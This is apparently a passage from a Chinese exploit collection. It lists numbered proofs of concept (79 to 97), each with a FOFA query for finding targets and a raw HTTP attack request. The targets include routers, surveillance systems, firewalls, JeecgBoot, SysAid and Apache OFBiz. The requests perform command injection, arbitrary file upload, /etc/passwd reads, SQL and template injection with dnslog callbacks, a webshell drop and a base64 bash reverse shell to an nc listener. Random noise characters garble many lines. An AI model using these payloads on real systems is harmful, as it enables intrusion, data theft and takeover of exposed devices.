Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l) V# m" x7 K! \# y! w" b5 z4 F

5 L- w; ^+ h5 t------YsOxWxSvj1KyZow1PTsh98fdu6l" _5 U* a8 b/ U7 T
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt": X/ R' q0 U! V4 }$ H
Content-Type: image/png  r& s3 _8 v0 B! G! e
3 D: x" v* v1 v+ K7 U1 u! G
YsOxWxSvj1KyZow1PTsh98fdu6l& u2 J% S& T" P/ K, P; n
------YsOxWxSvj1KyZow1PTsh98fdu6l
6 L! p* ?! s) |) HContent-Disposition: form-data; name="target"4 Z# A% w: ^  ^+ w# z7 G2 J$ j
2 U0 b/ S4 a) l$ |3 g
/Applications/SkillDevelopAndEHS/
: n- R8 K  l  y9 W6 I- E  B------YsOxWxSvj1KyZow1PTsh98fdu6l--
& \' p# O, j' N. ~
9 C. r+ F( c1 M2 [3 B6 z+ J; M# N5 A  Q- m& n& v: `+ w/ b
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
3 O1 \3 I! Y1 E* xHost: x.x.x.x
: r. ?4 Y- E3 I% b
7 n9 R7 y3 F4 g# h. R5 R0 x# a/ s2 t+ L7 M6 x# ~1 c
79. BYTEVALUE 百为流控路由器远程命令执行- K& G# o# h8 y) q2 a) t
FOFA:BYTEVALUE 智能流控路由器
4 v  m% Q5 q: h- G  uGET /goform/webRead/open/?path=|id HTTP/1.1" p1 K, w  l, X4 {0 F& u8 D
Host:IP
/ ~5 v8 F3 |2 q/ z7 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0* Q# o; B# f" M9 j# C0 p0 v* b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 Y, ^6 l; A) G  t8 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 N- Z/ I  E! f* l1 p
Accept-Encoding: gzip, deflate8 i" H" E3 q- H: U7 E/ e
Connection: close4 a' C/ A; T8 b$ p( U
Upgrade-Insecure-Requests: 1
( B9 C  ?* \2 F; O5 t& P% x, @
' |3 V6 x9 T5 h9 Q2 z( X/ j
# }1 P' n" Q; |; {' K, @80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
1 g; D% b5 s. }" j* U' XFOFA:app="速达软件-公司产品"! r# w+ |* S! e% F1 e6 t
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
; ?5 J7 R8 X+ O- W5 l3 @; uHost: x.x.x.x
; s7 S; o# a7 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: g+ T+ N( g2 DContent-Length: 27. P% l$ d# ]5 O$ \+ s  o! m# z6 d: A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* L' u6 A3 T1 G' i( R/ ^3 p, JAccept-Encoding: gzip, deflate' v4 Z$ |" I" \- P6 |: [/ H; O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; Q! x& i9 v9 nConnection: close
/ {: O. `+ ^" a, \& x  s& UContent-Type: application/octet-stream- P, f+ v! Z5 @* {
Upgrade-Insecure-Requests: 1
  Y2 ]; t9 T9 w/ P; T# f' w
! R- @' T1 N( @5 d% Q7 O  i, V<% out.print("oessqeonylzaf");%>
+ f2 W/ |9 K5 C8 u' a- j
  z6 h" u5 h9 j$ H  A. f
# w6 W2 y/ W4 \! Q2 O5 V$ ^GET /xykqmfxpoas.jsp HTTP/1.10 z3 s9 z( P4 w3 z
Host: x.x.x.x; ]( a4 Y2 _$ ^( i, M$ B. X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 F1 I. \2 ^! ^# L% U* S
Connection: close$ }0 y  l- I) h& A: r3 ^8 X  l$ x
Accept-Encoding: gzip( Y% |( J# m. i

% Q3 K' F8 c1 A6 E' j* l4 k
$ ]7 B: [2 w, {* H81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
2 O8 S( o$ y# n5 p, J# c" {FOFA:app="uniview-视频监控"
9 x5 I* h2 ~% ~1 E: X* QGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
( Q8 _5 `, j/ H+ n% v% W4 \Host: x.x.x.x
$ Q5 R7 {, E9 h# E, JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  h3 E3 O! H8 F; _. }- dConnection: close: [% ~6 b; d' H! i% O! a+ k2 q
Accept-Encoding: gzip# f( |! a. a! _: q4 X. n1 f

4 _6 g" O: O* p
6 d; a0 }& E" Q# A7 l82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行" m0 L5 B0 ]% [' z! f% E# p% |0 }
FOFA:app="思福迪-LOGBASE"
0 O6 B- x/ ?  h5 s  JPOST /bhost/test_qrcode_b HTTP/1.1
1 T# D& B/ [6 X. y6 ^2 vHost: BaseURL2 i# }0 y! J0 t
User-Agent: Go-http-client/1.13 h# M( L& L6 t7 s$ o5 d, C  V& l
Content-Length: 233 |  W, I- v: x! c* H
Accept-Encoding: gzip' a6 T/ W* j+ F$ Y4 S6 x
Connection: close7 [& Q: o  ]7 m
Content-Type: application/x-www-form-urlencoded( x. w; {! s4 R4 t4 u
Referer: BaseURL
8 F9 i- h4 i3 b& b' a, v2 g
7 c- b  M3 {! z6 }" O$ Jz1=1&z2="|id;"&z3=bhost1 q0 Z: }1 ~/ W3 O- P3 T7 M

% l/ ?4 D  v9 O6 R7 A( F+ e) m/ @0 k/ ^$ H3 k
83. JeecgBoot testConnection 远程命令执行
0 A8 W: B& w8 d' q" RFOFA:title=="JeecgBoot 企业级低代码平台"+ m! r) ?4 X8 u! ]7 `- g

: l% j( p% j& n: Q; k# [. ]- r3 K. n7 l7 ~4 r4 Q; J0 W5 {; B
POST /jmreport/testConnection HTTP/1.1
& |. T% A# t2 h+ i5 \5 ZHost: x.x.x.x0 i9 L/ j0 ^- n+ X9 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, c. b9 W4 @9 j3 o$ kConnection: close' W1 W2 F+ ?5 E$ M
Content-Length: 88814 [/ X3 f& u6 J
Accept-Encoding: gzip: e/ C5 H( G9 r6 Q- w
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"( L2 f$ C% ]3 D, `; {
Content-Type: application/json: ~7 m+ i' K0 U6 n
3 c, w6 K) ^( F
PAYLOAD
3 o$ H6 m3 V. r4 l: X
8 j/ M4 l+ m- N6 K* T84. Jeecg-Boot JimuReport queryFieldBySql 模板注入; }7 x9 Q  x% P) N. P9 d# w
FOFA:title=="JeecgBoot 企业级低代码平台". C  `1 I% ~: u. ^+ }3 `& M

! x- h8 H: ?: T+ l* }; r+ t" u" @  s3 p( F
+ A  \4 l7 P/ A7 P6 _0 a5 d
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
# Q0 O. _) _0 c5 J, X& q) ~Host: 192.168.40.130:8080
- o/ Q% \  R9 b* iUser-Agent: curl/7.88.10 ?( z0 l8 o1 Z/ ~0 L% O
Content-Length: 156! I0 d7 r. s' B4 o1 o% l& f
Accept: */*6 |- `$ N0 P& Z# e  z2 ~' S7 B( I: W! f
Connection: close# s- E5 n) d" p( n9 a& H
Content-Type: application/json
* ]8 t$ `5 d* z; j) B* k' |% pAccept-Encoding: gzip
; f+ `3 |; _$ L2 c1 K+ s  [2 b& @3 S4 t6 }+ H2 s. ?1 h: S$ a
{
+ e, \1 n/ l5 U9 G6 K9 { "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
" E6 Z2 ?* v/ {) _  "type": "0"
" K- M* I! N$ ?5 [+ A" M}3 P" ?* s/ m8 F+ C5 [" d

- S, ?, \; J% U* N1 u8 L" L+ Q$ u( E8 H$ k
85. SysAid On-premise< 23.3.36远程代码执行
  s8 z& M; @' p) C# uCVE-2023-47246" G, W6 W/ T2 i2 q( L( w
FOFA:body="sysaid-logo-dark-green.png" + G0 l2 Y$ U- a# [7 ]
EXP数据包如下,注入哥斯拉马
+ ]- H% d. g, |$ UPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.19 M1 M1 D2 D6 @' y+ r6 M! ^
Host: x.x.x.x- z" m, R8 _; e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. }5 h/ U3 s: ^! R( k" W4 L, AContent-Type: application/octet-stream5 J/ \3 A) ?) i
Accept-Encoding: gzip
; ~' U* ~! |6 l- C" [. C. A/ a- k1 F; l' |+ u6 w$ _
PAYLOAD- g1 a: V" c* {
, U3 Y! q$ s5 @* \  ?
回显URL:http://x.x.x.x/userfiles/index.jsp
; z( l5 C  {# ^' _- x3 {- b: K
86. 日本tosei自助洗衣机RCE8 h* C3 R2 h# |+ `
FOFA:body="tosei_login_check.php"; D( y4 z* N( Y: R# U4 }
POST /cgi-bin/network_test.php HTTP/1.1
# H6 y$ s! L: cHost: x.x.x.x
+ C! r9 j4 d% `* u: |* t+ bUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
+ z$ Q" d2 e+ z' i& |Connection: close& i) O0 x3 @  k6 f* g& c, D
Content-Length: 44! I/ \* D3 |( ?& p+ g- T" ~/ o
Accept: */*
! C& y( ~" X4 s; VAccept-Encoding: gzip# U. u5 Q, q. m$ a* j6 \
Accept-Language: en; S1 M2 c# V& E( \; j% E
Content-Type: application/x-www-form-urlencoded0 }* j& C* `  K. p9 E1 _1 M
! a0 X( S/ w4 H* }
host=%0acat${IFS}/etc/passwd%0a&command=ping
; z) [: c" H  G
, y/ Y0 y; P, s' f+ R: E7 H$ B
# S  o; i( H5 P, _5 H% N87. 安恒明御安全网关aaa_local_web_preview文件上传
0 G; q! M$ f3 WFOFA:title="明御安全网关". }2 \+ n6 Q1 Z; L& q
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1! \) R3 ^  X  @' r( V! w
Host: X.X.X.X
) d2 o  j: g/ ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' h* w0 N# ?( M9 k6 ZConnection: close8 @, y8 V- {" ?7 E8 @9 U- |/ ~
Content-Length: 198
5 m  m$ ^/ w4 b+ B" B6 nAccept-Encoding: gzip3 F( j& G2 x4 z. w  `/ z
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
# z: j2 l' f6 ^( M! a, F6 p  |
" n0 b1 A; X' J$ e: {# w+ U--qqobiandqgawlxodfiisporjwravxtvd
6 n" I1 g' p8 y6 l0 lContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
6 Z% F3 {2 E( a( _% uContent-Type: text/plain
3 K/ e$ g; H4 r5 ?8 L/ p  |
8 {" B& E, S& H0 x; E8 l# x2ZqGNnsjzzU2GBBPyd8AIA7QlDq
, j9 \2 _6 d, X  S7 v--qqobiandqgawlxodfiisporjwravxtvd--
# r3 H" h0 u( p" M# u" ~3 r$ ?0 m/ O; F

2 _) K. c) Y' Q: h1 i* D) e/jfhatuwe.php' x6 V( A; ^; u

& k' X* F7 u1 `1 V; ^$ N2 a, n88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
, [8 N' ]' j9 q. fFOFA:title="明御安全网关"
$ d: F  G) F% C* XGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
/ J* b! V, }3 N  YHost: x.x.x.xx.x.x.x/ B0 k; q, K5 Z  \+ t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: R! {! s. A- ]% y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: g4 v0 @1 \+ y2 G2 x; hAccept-Encoding: gzip, deflate
" }% @+ n1 {/ XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 L+ x! b% H# fConnection: close
: J3 L4 a8 _9 h$ W2 R+ V! l% ]5 F2 @; ?: u3 |: n( Q

7 m( Z. s* I; D! O. {/astdfkhl.php
, _' D/ b& V/ |- k/ Y6 l# ~5 a
& o4 X$ c  ]3 w5 z. b3 [* N89. 致远互联FE协作办公平台editflow_manager存在sql注入1 ^+ L" }; `  H) ]
FOFA:title="FE协作办公平台" || body="li_plugins_download"
+ h% |3 r5 ?  V& O* c2 g# b, NPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
. `/ J% R6 b/ [7 Z1 x6 Z0 k9 v9 cHost: x.x.x.x
0 K- g, I( ^, EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  n6 b6 M( H: z8 i( _$ u2 L
Connection: close
: [' ^. m; Z6 X$ LContent-Length: 41/ s6 C$ j/ Z( x
Content-Type: application/x-www-form-urlencoded. q% U' n4 s& c$ @" P) X
Accept-Encoding: gzip
2 Q* V: H4 P% p0 e6 e  c; i! v
, y0 ?8 ^& }1 poption=2&GUID=-1'+union+select+111*222--+5 f" |9 e4 ^9 S. v8 j+ T

% [  X! i7 I" a( q- _( o( s3 d8 {0 B" S. g3 X3 J5 H6 f  X
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行, c) ^& \& ]) k, ]8 l" o
FOFA:icon_hash="-1830859634"1 ^# i9 e" o3 X$ g7 i
POST /php/ping.php HTTP/1.15 Y7 m) q7 s0 S  z$ h6 Y: C
Host: x.x.x.x/ b, E+ W7 O8 i6 ^# a6 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  N  B( h4 B8 L8 {! j/ ^Content-Length: 51* F+ e' h2 P% `! k% p) _' b
Accept: application/json, text/javascript, */*; q=0.01, s: W* y" O3 g; D/ U
Accept-Encoding: gzip, deflate8 C; Q4 y! Q" e& G3 o2 ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! n9 t. Q1 t6 M. |, LConnection: close
8 T  H: K! y! z! eContent-Type: application/x-www-form-urlencoded% u  l3 R5 {: s/ q8 H+ r
X-Requested-With: XMLHttpRequest* M" B. [) r( D7 c

  E. |6 ~$ H7 s  \) ajsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig9 K0 S" Z, }) x3 B6 V) B, @

2 g- X( e: e. T% q2 q6 b. O$ I3 u2 J; p" \
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取0 y) L$ L7 @1 W: d
FOFA:title="综合安防管理平台"
4 V0 t) \: y2 _/ zGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.16 x% ]% E4 ?' x1 K& _
Host: your-ip) O- r/ ?8 ~. Q+ o; ~& T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.363 \: }+ A' [. Z" o3 ~/ L
Accept-Encoding: gzip, deflate
  j% D* O9 }3 w+ [( @; UAccept: */*
+ V$ }( O. P2 E- GConnection: keep-alive1 I! H( |) P6 V9 f2 H% b
8 `+ j- D4 l/ ?$ H+ r! V. L. [" M
8 J+ ]3 R) M- }2 p8 q

1 i2 E1 v; ^; |* n2 \8 i9 |5 z92. 海康威视运行管理中心session命令执行
! X% W$ n5 a" ], d9 A1 w5 zFastjson命令执行6 b0 |7 L, g, ]' O' j
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
. s  P! v5 `8 p6 G1 O! D0 x7 [; qPOST /center/api/session HTTP/1.1+ d! q3 d/ H0 k# h
Host:! f: {+ h# a% I$ u( _/ X$ e
Accept: application/json, text/plain, */*0 t& g/ V1 z/ O1 U6 N: T6 F
Accept-Encoding: gzip, deflate
( M" v3 B: b, d- |. z% L! {9 OX-Requested-With: XMLHttpRequest
: y3 u6 ^% u+ K. A/ |8 t5 m0 h1 q6 [Content-Type: application/json;charset=UTF-8
6 d) {" |7 H/ u+ s! LX-Language-Type: zh_CN
# E9 h$ v- Q8 R5 F: NTestcmd: echo test
2 r( t3 ?1 J* U6 }1 w: M" {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9 p. u6 l6 \4 u7 k" F1 sAccept-Language: zh-CN,zh;q=0.9
4 U. L6 N- z- }2 @9 P6 BContent-Length: 5778  d/ L* n. S" m" M: {

: x- I% I/ O& {1 QPAYLOAD
  E+ R/ q, o9 V& b/ d7 B. {
& F+ n  E* n5 P& E: t" t3 Q; H! Z4 O/ \5 Y% ^( Y1 P0 Y; p
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
& i- Z: U  s, W- j2 ~, VFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
, J6 w! n8 z( R$ D) d/ U, t7 \5 MPOST /?g=app_av_import_save HTTP/1.1
/ ?" P( v7 D! T6 Z! r! a. YHost: x.x.x.x
7 c2 U+ \  L: x9 vContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx% ~. j6 ~' L* h6 s, Q% P: Y" V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ x; e4 v2 i9 X# q
6 r7 I( y7 I5 B------WebKitFormBoundarykcbkgdfx0 ~+ a; t4 M- c3 m  g9 h* w
Content-Disposition: form-data; name="MAX_FILE_SIZE"
& d# ?% T7 D: O* _& o9 @
; e# r) U6 c/ L6 d8 ^4 R2 b10000000" H8 T' k- c  H
------WebKitFormBoundarykcbkgdfx
; g8 F4 Y7 ~, l' O5 [  jContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
; }; Y: E# ?- K) @% wContent-Type: text/plain
/ y9 ~# P5 n+ b5 G! [
0 E4 r$ K; D- n# d; S; ~0 H" P. Pwagletqrkwrddkthtulxsqrphulnknxa; L4 `( i) q6 X: N
------WebKitFormBoundarykcbkgdfx+ D5 l. u5 Q" `5 Y
Content-Disposition: form-data; name="submit_post"! u# a- P! \' d' a6 L9 [

5 o; g. |/ G, H1 h/ i+ `  Y# Cobj_app_upfile
& a$ J, [# G  X' a0 Z; M+ R------WebKitFormBoundarykcbkgdfx
8 Z- t& Y; w/ v3 x8 O2 KContent-Disposition: form-data; name="__hash__"
/ I5 `' s2 ]$ E6 x$ A# L  a5 t- O3 l' d7 i6 f1 f
0b9d6b1ab7479ab69d9f71b05e0e9445; I# L9 w+ R! J. k' Z$ e
------WebKitFormBoundarykcbkgdfx--  X' @9 G6 S  ~- X1 ?. [

+ U' [) r. a0 V' \0 p, @" q+ X6 C& J$ a. \$ Q: s
GET /attachements/xlskxknxa.txt HTTP/1.10 `: e- y, n3 C2 Z& D; }1 B
Host: xx.xx.xx.xx+ _- p4 u1 g! c: j, N
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 f6 J' ~+ I0 q0 B/ K& t! C
" X) c0 h5 H* @: |

8 }- w# O2 ?. y7 i8 n( X94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传# l0 `) d5 U) G" s+ W
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
9 m  F5 z* Q- B, hPOST /?g=obj_area_import_save HTTP/1.1
; c. D; k3 c. UHost: x.x.x.x" ~7 A* e( s7 x0 t! Y/ N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt: \0 t5 x% W/ i1 R  G- L. Z+ v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ r. k4 k2 R" _! j) P2 Q5 L+ [$ G' ?$ [
------WebKitFormBoundarybqvzqvmt# M  M& a5 o8 W( o) R8 @8 u$ x
Content-Disposition: form-data; name="MAX_FILE_SIZE"
) x7 i& z4 J2 |7 G6 W( t9 W0 ?# x/ C# {: {! _" [. \
10000000
; }7 S  }/ b) q" Y------WebKitFormBoundarybqvzqvmt
8 D; H& ^/ r" }+ [0 hContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"" @, ^; I" _" j& I, [. s5 d
Content-Type: text/plain
+ P2 Z$ j. D  K/ B% X4 D* K, g. {
pxplitttsrjnyoafavcajwkvhxindhmu
7 C$ M- k6 V: M8 k/ o. k------WebKitFormBoundarybqvzqvmt
( _/ L* ~4 n; O. g' N  o! vContent-Disposition: form-data; name="submit_post"7 b8 G$ e1 i- l1 q
" P- h& o/ d; D
obj_app_upfile
5 s6 ?- D- D* `8 D1 a3 ]------WebKitFormBoundarybqvzqvmt7 Z1 I) r" ]/ A# A/ y4 m7 T
Content-Disposition: form-data; name="__hash__"
% F& O; c+ f1 @3 r$ c  ^( j5 e
* p4 L* f- ~$ R7 W/ [0b9d6b1ab7479ab69d9f71b05e0e9445
4 b4 _. o; Q! C8 ~# |( |------WebKitFormBoundarybqvzqvmt--
  j( m+ @; ^( a
% S5 Y  P! L! ]
! ?4 _6 ~9 L: u! N4 y5 s  h$ o
) c" Y9 \8 U. F7 J% Z) SGET /attachements/xlskxknxa.txt HTTP/1.1
5 C! f5 C" h; E; w; p# P8 BHost: xx.xx.xx.xx
9 D6 ?( D; `( Q; s9 }3 t+ sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 D+ \7 M' e  g2 h$ J0 T! M! f; o: g6 F2 t: ~4 G! Y% T) v# e6 ^
  x# h0 p# J. E( W6 V- T: j

% p- }# T' `1 \$ w! e1 v% m0 |95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
7 i) U1 Q7 Z4 Z$ S$ |CVE-2023-49070
3 u# f1 d! Y# D1 U8 K: k& CFOFA:app="Apache_OFBiz"
5 X; G( {& g7 c/ s. t& x. `POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
' k" E+ d3 O# M. O! v/ FHost: x.x.x.x
% }. N: |1 I7 n* EUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( S! s- A' C4 k0 E/ h
Connection: close' x1 k( D+ B! a* J. d4 B
Content-Length: 889
! c( K; ]  g" J2 T; i! MContent-Type: application/xml
/ t  A: f4 w/ I  X6 ~6 YAccept-Encoding: gzip
6 M& A. w: r+ B% `
$ c- t7 D3 }$ ]/ k0 ]- Z<?xml version="1.0"?>
0 W  c3 A' J$ T2 s" ]<methodCall>
* Z* y' a8 Q1 v' s$ g   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>) M/ L2 u2 }2 B4 r8 _1 y
    <params>
5 D1 b) A) `" G' E0 W* N/ D      <param>
  _' r0 Z5 i$ Y2 U! P% L7 |6 E& e6 r      <value>
- t/ g, @3 |" n# K  q3 |# d3 n        <struct>) b; {" g' ^/ {
       <member>* z9 _* N0 l! w( z& l+ ~. `
          <name>test</name>1 n. ]1 O' V& `8 ]
          <value>, G8 {" N" x" f/ X/ z
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
  d& F! P! V( B6 }          </value>
8 @5 [  T. A- E4 [* F        </member>
5 @8 z- j) ^0 i2 p: \$ q+ `( F      </struct>
7 v/ [9 j% z, v/ @      </value>$ m* n3 ~! x. S; Z1 O
    </param>
' T5 t$ G" B4 [6 t    </params>( L; l" Q1 S8 Q  _) r! X
</methodCall>
( w6 w% _+ T1 n; Q( c
6 v2 J) n7 Q; X! Y
& p7 ~2 s4 R+ l; z2 [5 [5 ^! z用ysoserial生成payload0 o: j3 N- X5 `2 M7 K# k- u
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"+ `# e7 ~* W! b: e+ y4 u* T

# {1 y2 U+ p% y/ \. w* y; n8 p: F6 f- J6 u4 W) m
将生成的payload替换到上面的POC
! f5 H! m+ |! E1 Y  ~3 V4 wPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" i8 ?( W- `0 p9 A
Host: 192.168.40.130:8443  ^. l' T  V5 u' d3 E" e3 N# M% \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36% s0 r; z& }: f' }8 E
Connection: close1 h/ X0 ?! N$ l4 j( n6 c) \
Content-Length: 889/ a1 I7 S% b* @% i
Content-Type: application/xml& M! I: V) C8 ]/ o+ r: k& |7 F$ q  o
Accept-Encoding: gzip
& C1 L: f$ T" ]4 G# w0 P
. J$ g3 k# r! A% l) BPAYLOAD
. ^( F. `, D/ Z
- ]+ q9 p+ j5 M% Q; G' e7 C7 U/ i96. Apache OFBiz  18.12.11 groovy 远程代码执行/ |0 y( P$ k0 F7 q7 A9 e
FOFA:app="Apache_OFBiz"1 m1 d/ W3 m* V3 S5 ~! @
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
1 h+ |1 d& H3 SHost: localhost:8443$ s3 O% H  Q6 J" i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! M  L0 i6 {, e' P& H0 }
Accept: */*' C3 @+ Q2 a  J% C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 `! L( T5 V' [) B; EContent-Type: application/x-www-form-urlencoded
! W% `& g3 |& x# q+ HContent-Length: 559 \+ h% D/ s9 U6 j9 V
5 o' f0 `8 h7 [/ P* Q1 d4 M
groovyProgram=throw+new+Exception('id'.execute().text);1 R- G. z: Q! ?" X, n( \" f+ A4 N. l
2 j9 ]: v- ^  Y3 W* Z
6 }7 U. u- l4 h' k+ H
反弹shell+ L* f, `' V  b7 k
在kali上启动一个监听( F9 H- k* \' L6 M) l3 Z8 j. u
nc -lvp 7777
/ n0 R2 _6 O( I4 ^$ E% [* v8 S/ J- q" U8 P, D8 y0 Q) W  R
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
: Q0 @3 Q0 ]4 ]9 M; A6 m  zHost: 192.168.40.130:8443
- r$ ]5 o! X, [) tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" G# K% R5 o3 \7 z
Accept: */*
; e" `2 d% ?, R6 }$ nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, e( T. ~# u& p3 O, I: i1 e% u) y- vContent-Type: application/x-www-form-urlencoded
) q4 J: D& z! d# @Content-Length: 71
- C* j; S6 p& D: b% Y" N9 ~3 a3 [7 G6 Y' b/ d; n/ ^3 j. p
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
( k/ B, n# r& u/ I6 p$ b9 |& ?6 p) `6 h/ r6 C5 V/ I
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
% O" }! M3 l, @6 G$ wFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
* d, n# S. _$ V4 I8 _( i  WGET /passport/login/ HTTP/1.1& p) q6 e; Z9 j6 ?
Host: 192.168.40.130:80852 b4 }" J+ }# a9 x4 X: F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 |, o4 H8 P! f& t4 V' z. y2 ]& W1 [Accept-Encoding: gzip/ m  c$ S; e& B
Connection: close
' p/ x* k7 N$ s1 g* MCookie: rememberMe=PAYLOAD
